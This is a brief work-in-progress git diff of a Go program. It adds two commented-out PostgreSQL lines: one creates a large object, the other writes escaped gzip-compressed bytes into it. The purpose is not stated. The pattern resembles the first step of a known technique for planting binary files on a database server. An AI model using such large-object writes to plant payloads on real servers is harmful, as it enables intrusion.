wip
This commit is contained in:
@@ -25,6 +25,8 @@ func run(ctx context.Context) error {
|
||||
}
|
||||
|
||||
return with.PSQL(ctx, *c, func(pg *sql.DB) error {
|
||||
// SELECT lo_creat(-1);
|
||||
// SELECT pg_catalog.lowrite(0, '\\037\\213\\010\\000\\000\\000\\000\\000\\000\\000\\245\\220;n\\3030\\014')
|
||||
return ctx.Err()
|
||||
})
|
||||
}
|
||||
|
||||
Reference in New Issue
Block a user